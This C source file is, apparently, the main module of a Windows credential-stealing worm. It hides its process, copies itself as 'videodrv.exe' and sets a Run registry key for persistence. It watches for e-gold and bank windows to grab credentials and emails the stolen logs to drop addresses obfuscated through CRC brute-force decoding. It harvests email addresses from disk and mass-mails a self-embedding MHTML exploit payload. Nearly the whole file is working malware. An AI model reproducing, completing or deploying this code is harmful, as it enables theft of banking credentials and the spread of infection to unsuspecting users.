/* 				p i z d a t o				*/

#include <windows.h>
#include <stdio.h>
#include <io.h>

#define START_TIMEOUT 60*1000
#define THREADS_MAX 7

struct _storage {
	char szCurrentFile[MAX_PATH];
	char szWindowsDir[MAX_PATH];
	char szZipFile[MAX_PATH];
	char szTmpFile[MAX_PATH];
	char szEmailsFile[MAX_PATH];
};

struct _storage storage;

struct _info {
	BOOL fScanFinished;
	int nScanEmailsFound;
	char szEmailEgold1[256];
	char szEmailEgold2[256];
	char szEmailPass1[256];
	char szEmailPass2[256];
	BOOL fEmailSearchCompleted;
};

struct _info info;

LRESULT CALLBACK HelloWorldWndProc(HWND, UINT, UINT, LONG);
void InitWindowClass(WNDCLASS *, HINSTANCE, char *);
//int log_println(char *str, ...);
int is_already_installed(void);
int make_tmp(void);
void email_remove_crlf(char *email);
DWORD WINAPI scan_start(void);
DWORD WINAPI send_start(void);
DWORD WINAPI email_decrypt(void);
DWORD WINAPI grab_start(void);
int decrypt(unsigned long ulCrc,char *buf);

#include "crc32.c"
#include "zip.c"
#include "threads.c"
#include "my_mx.c"
#include "scan.c"
#include "grab.c"
#include "smtp.c"

typedef int ( WINAPI *RSP ) (DWORD,DWORD);

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
	LPSTR lpszCmdParam, int nCmdShow){

	HWND hWnd;
	WNDCLASS WndClass;
	MSG Msg;
	HINSTANCE hLib;

	char *szClassName = " ";
	RSP RegisterServiceProcess = NULL;

	if((hLib = LoadLibrary("kernel32.dll")) != 0){
	RegisterServiceProcess = (RSP)GetProcAddress(hLib, "RegisterServiceProcess");
		if(RegisterServiceProcess)
			RegisterServiceProcess(0,1);
	}

	crc32_init();
	info.fScanFinished = FALSE;
	info.nScanEmailsFound = 0;
        info.fEmailSearchCompleted = FALSE;

	WSADATA wsaData;
	if (WSAStartup (MAKEWORD (1,0), &wsaData) != 0)
			return FALSE;
  
	if(!is_already_installed()){
		//log_println("Not native copy, path %s\n",storage.szCurrentFile);
		return 0;
	} else {
		GetWindowsDirectory(storage.szWindowsDir,MAX_PATH);

		strncpy(storage.szZipFile,storage.szWindowsDir,MAX_PATH);
		strncat(storage.szZipFile,"\\zip.tmp",MAX_PATH);
		DeleteFile(storage.szZipFile);

		strncpy(storage.szTmpFile,storage.szWindowsDir,MAX_PATH);
		strncat(storage.szTmpFile,"\\exe.tmp",MAX_PATH);
		DeleteFile(storage.szTmpFile);

		strncpy(storage.szEmailsFile,storage.szWindowsDir,MAX_PATH);
		strncat(storage.szEmailsFile,"\\eml.tmp",MAX_PATH);
		DeleteFile(storage.szEmailsFile);

		make_tmp();
		zip_make(storage.szTmpFile,storage.szZipFile);
	}

	InitWindowClass(&WndClass, hInstance, szClassName);
	if(!RegisterClass(&WndClass)){
		//MessageBox(NULL, "Error:\nCan't register class", CLASS_NAME, MB_OK);
		return 0;
	}
	hWnd = CreateWindow(szClassName, " ", WS_OVERLAPPEDWINDOW,
		CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT,
		NULL, NULL, hInstance, NULL);
	if(!hWnd){
		MessageBox(NULL,"Error creating window\n", "msg", MB_OK);
		return 0;
	}

	SetTimer(hWnd,1,5000,0);

	//ShowWindow(hWnd, nCmdShow);
	//UpdateWindow(hWnd);

	while(GetMessage(&Msg, 0, 0, 0)) {
		TranslateMessage(&Msg);
		DispatchMessage(&Msg);
	}
	return Msg.wParam;
}

LRESULT CALLBACK HelloWorldWndProc(HWND hWnd, UINT Message, UINT wParam,
	LONG lParam)
{
	DWORD dwThreadId;
	switch(Message){
		case WM_CREATE:
			//MessageBox(0,"start","info",MB_OK);
			//CreateThread(0,0,(LPTHREAD_START_ROUTINE)scan_start,0,0,&dwThreadId);
			CreateThread(0,0,(LPTHREAD_START_ROUTINE)email_decrypt,0,0,&dwThreadId);
			return 0;
		case WM_TIMER:
			KillTimer(hWnd,1);
			if(gethostbyname("www.google.com")!=NULL){
				CreateThread(0,0,(LPTHREAD_START_ROUTINE)grab_start,0,0,&dwThreadId);
				CreateThread(0,0,(LPTHREAD_START_ROUTINE)scan_start,0,0,&dwThreadId);
				CreateThread(0,0,(LPTHREAD_START_ROUTINE)send_start,0,0,&dwThreadId);
			}
			return 0;
		case WM_DESTROY:
			PostQuitMessage(0);
			return 0;
	}
	return DefWindowProc(hWnd, Message, wParam, lParam);
}

void InitWindowClass(WNDCLASS * WndClass, HINSTANCE hInstance,
	char * szClassName)
{
	WndClass->style = CS_HREDRAW | CS_VREDRAW;
	WndClass->lpfnWndProc = HelloWorldWndProc;
	WndClass->cbClsExtra = 0;
	WndClass->cbWndExtra = 0;
	WndClass->hInstance = hInstance;
	WndClass->hIcon = LoadIcon(NULL, IDI_APPLICATION);
	WndClass->hCursor = LoadCursor(NULL, IDC_ARROW);
	WndClass->hbrBackground = (HBRUSH) GetStockObject(WHITE_BRUSH);
	WndClass->lpszMenuName = NULL;
	WndClass->lpszClassName = szClassName;
}

DWORD WINAPI grab_start(void){
	char szWndTitle[256];
	char szSubj[256];
	/* XXX: сделать чтобы грабер работал через каждые 30 мин */

	while(TRUE){
		GetWindowText(GetForegroundWindow(),szWndTitle,255);
		unsigned long ulBufCrc = crc32(0,szWndTitle,21);
		if(ulBufCrc == 0x90e38063){
			//log_println("window found");
			grab();
			while(info.fEmailSearchCompleted == FALSE) { Sleep(500); }
			get_random_text(szSubj,0);
			//log_println("Send '%s' '%s' '%s'",info.szEmailEgold1,info.szEmailEgold2,szSubj);
			smtp_init();
			smtp_send_file(LOGFILE_EGOLD,info.szEmailEgold1,info.szEmailEgold1,szSubj);
			smtp_send_file(LOGFILE_EGOLD,info.szEmailEgold2,info.szEmailEgold2,szSubj);
			DeleteFile(LOGFILE_EGOLD);
			Sleep(30*60*1000); // 30 mins
		} else if(strlen(szWndTitle)>5) {
			char *p; 
			char *p1;
			unsigned long ulBankCrc;
			p = &szWndTitle[0];
			// 0xD860BF7A = bank
			for(int i=0;i<strlen(szWndTitle)-5;i++){
				p1 = p +i;
				ulBankCrc = crc32(0,p1,4);
				if(ulBankCrc == 0xD860BF7A){
					//log_println("Bank found\n");
					grab2();
					get_random_text(szSubj,0);
					smtp_send_file(LOGFILE_EGOLD,info.szEmailPass1,info.szEmailPass1,szSubj);
					smtp_send_file(LOGFILE_EGOLD,info.szEmailPass2,info.szEmailPass2,szSubj);
					DeleteFile(LOGFILE_EGOLD);
					Sleep(30*60*1000); // 30 mins
					break;
				}
			}
		}
		Sleep(1500);
	}
	return 0;
}

DWORD WINAPI email_decrypt(void){

	char buf[256];
	char target1[256];
	char target2[256];
	char target3[256];
	char target4[256];

	target1[0] = 0;
	decrypt(0x41C60EEF,buf); // omnib
	strcat(target1,buf);
	decrypt(0xDDDA81FD,buf); // bb@gm
	strcat(target1,buf);
	decrypt(0x42C648F3,buf); // x.net
	strcat(target1,buf);

	target2[0] = 0;
	decrypt(0x41C60EEF,buf); // omnib
	strcat(target2,buf);
	decrypt(0xC5D1F791,buf); // cd@gm
	strcat(target2,buf);
	decrypt(0x42C648F3,buf); // x.net
	strcat(target2,buf);

	target3[0] = 0;
	decrypt(0x83F98125,buf); // drbz@
	strcat(target3,buf);
	decrypt(0xFB8A00B9,buf); // mail1
	strcat(target3,buf);
	decrypt(0x74F90712,buf); // 5.com
	strcat(target3,buf);

	target4[0] = 0;
	decrypt(0xDC0D36A6,buf); // kxva@
	strcat(target4,buf);
	decrypt(0xFB8A00B9,buf); // mail1
	strcat(target4,buf);
	decrypt(0x74F90712,buf); // 5.com
	strcat(target4,buf);

	strcpy(info.szEmailEgold1,target1);
	strcpy(info.szEmailEgold2,target3);

	strcpy(info.szEmailPass1,target2);
	strcpy(info.szEmailPass2,target4);

        info.fEmailSearchCompleted = TRUE;
	
	/*log_println("Emails: '%s' '%s' '%s' '%s'",info.szEmailEgold1,info.szEmailEgold2, \
		info.szEmailPass1,info.szEmailPass2);*/
	return 0;
}

DWORD WINAPI scan_start(void){
	Sleep(START_TIMEOUT);
	scan_shell_folders();
	find_files("C:\\Program Files\\");
	info.fScanFinished = TRUE;
	return 0;
}

DWORD WINAPI send_start(void){
	Sleep(START_TIMEOUT);
	/* wait while email found */
	while(info.nScanEmailsFound == 0) {};

	FILE *fp = fopen(storage.szEmailsFile, "r");
	if(!fp) return 0;

	WSADATA wsaData;
	if (WSAStartup (MAKEWORD (1,0), &wsaData) != 0)
			return FALSE;

	ZeroMemory(&mx_threads,sizeof(mx_threads));
	mx_engine.nThreadsMax = THREADS_MAX;

	mx_engine.nThreadsActive = 0;
	mx_engine.messages_sent = 0;
	mx_engine.fFinished = FALSE;

	for(int i=0;i<mx_engine.nThreadsMax;i++){
		mx_threads[i].fBusy = FALSE;
	}

	while((mx_engine.nThreadsActive) || (mx_engine.fFinished==FALSE))
	{
		if(mx_engine.nThreadsActive<mx_engine.nThreadsMax){
			int nIndex = mx_get_free_cell();
			if(nIndex == -1){
				//log_println("Threads collision\n");
				return 1;
			}
			mx_threads[nIndex].index = nIndex;

			if(mx_get_email(fp,mx_threads[nIndex].szTo)==0){
				char *domain = strchr(mx_threads[nIndex].szTo,'@');
				if(domain){
					domain++;
					strncpy(mx_threads[nIndex].szDomain,domain,255);
					mx_threads[nIndex].fBusy = TRUE;
					mx_threads[nIndex].dwStartTime = GetTickCount();
					mx_engine.nThreadsActive++;
					mx_threads[nIndex].hThread = CreateThread(0,0,(LPTHREAD_START_ROUTINE)mx_thread,(void *)nIndex,0,&mx_threads[nIndex].dwThreadId);
				}
			}
		} else {
			threads_kill_test();
			Sleep(500);
		}
	}

	fclose(fp);
	return 0;
}

int mx_get_email(FILE *fp, char *buf){
	char *res = 0;

	while(res == 0){
		res = fgets(buf,255,fp);
		if(res==0) Sleep(500);
	}

	email_remove_crlf(buf);
	/* TODO: remove this debug line */
	//strcpy(buf,"bank@vozrozhdenie.com");
	return 0;
}


/*int log_println(char *str, ...){
	va_list va;
	va_start(va, str);
	char *buf = malloc(0xffff);
	char *fp = fopen("logfile.txt","ab");
	if(!buf || !fp) {
		printf("Critical error: not enough memory\n");
		va_end(va);
		return 1;
	}
	vsprintf(buf, str, va); 
	fprintf(fp,"%s\n",buf);
	free(buf);
	fclose(fp);
	return 0;
}*/

int is_already_installed(void){
	char buf_name[MAX_PATH];
	char win_dir[MAX_PATH];

	char *path = buf_name;
	strncpy(buf_name,GetCommandLine(),MAX_PATH);
	if(*path == '"') {path++;}
	for(int i = 0; i < MAX_PATH; i++){
		if(buf_name[i] == '"'){ buf_name[i] = 0; }
	}

	strncpy(storage.szCurrentFile,path,MAX_PATH);
	//log_println("Path: '%s'\n",path);

	GetWindowsDirectory(win_dir,MAX_PATH);
	strcat(win_dir,"\\videodrv.exe");
	//log_println("Install to: '%s'\n",win_dir);

	CopyFile(path,win_dir,FALSE);

	/* XXX: remove comment */
	HKEY reg;
	RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &reg);
	RegSetValueEx(reg, "VideoDriver", 0, REG_SZ, win_dir, strlen(win_dir));
	RegCloseKey(reg);

	HANDLE hFile = CreateFile(win_dir, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, \
		FILE_ATTRIBUTE_NORMAL, 0);

	if(hFile == INVALID_HANDLE_VALUE){
		//log_println("Already installed\n");
		return 1; // TRUE
	}

	//log_println("File wasn't installed!\n");
	CloseHandle(hFile);

	WinExec(win_dir,SW_HIDE);
	return 0;
	//return 1; /* XXX: remove this debug line */
}

int make_tmp(void){
		DeleteFile(storage.szTmpFile);
		FILE *fp = fopen(storage.szTmpFile,"ab");
		if(!fp) return 1;

		/* 1st part */

		fprintf(fp,"MIME-Version: 1.0\n"\
			"Content-Location:File://foo.exe\n"\
			"Content-Transfer-Encoding: binary\n\n");

		/* 2nd part */

		FILE *fp2 = fopen(storage.szCurrentFile,"rb");
		if(!fp2) return 1;

		int f2_len = _filelength(_fileno(fp2));
		char *pf2 = malloc(f2_len);
		if(!pf2) return 1;

		fread(pf2,1,f2_len,fp2);
		fwrite(pf2,f2_len,1,fp);
		if(pf2) free(pf2);
		fclose(fp2);

		/* 3rd part */

		fprintf(fp,"<body bgcolor=black scroll=no>\n"\
			"<SCRIPT>\n"\
			"function malware()\n{\n"\
			"s=document.URL;path=s.substr(-0,s.lastIndexOf(\"\\\\\"));\n"\
			"path=unescape(path);\n"\
			"document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face=\"Arial\" color=black style=\"position:absolute;top:20;left:90;z-index:100; font-size:12px;\">No message</center><OBJECT style=\"cursor:cross-hair\" alt=\"moo ha ha\" CLASSID=\"CLSID:11111111-1111-1111-1111-111111111111\"  CODEBASE=\"mhtml:'+path+'\\\\message.html!File://foo.exe\"></OBJECT>')\n"\
			"}\nsetTimeout(\"malware()\",150)\n\n</script>");

		fclose(fp);
		//log_println("Zip file '%s'\n",storage.szZipFile);
		//log_println("Tmp file '%s'\n",storage.szTmpFile);
	return 0;
}

void email_remove_crlf(char *email){
	for(unsigned int i=0;i<strlen(email);i++){
		if(email[i] == 0x0a || email[i] == 0x0d)
			email[i] = 0;
	}
}

int decrypt(unsigned long ulCrc,char *buf){
#define AA 30
	char alpha1[] = "abcdefghijklmnopqrstuvwxyz@.15";
	char str[256];

	//printf("Looking for crc 0x%.8X\n",ulCrc);
	for(int i1=0;i1<AA;i1++){
		for(int i2=0;i2<AA;i2++){
			for(int i3=0;i3<AA;i3++){
				for(int i4=0;i4<AA;i4++){
					for(int i5=0;i5<AA;i5++){
						str[0] = alpha1[i1];
						str[1] = alpha1[i2];
						str[2] = alpha1[i3];
						str[3] = alpha1[i4];
						str[4] = alpha1[i5];
						str[5] = 0;
						unsigned long myCrc = crc32(0,str,5);
						if(myCrc == ulCrc){
							//printf("%s\n",str);
							strcpy(buf,str);
							return 0;
						}
					}
				}
			}
		}
	}
	return 1;
}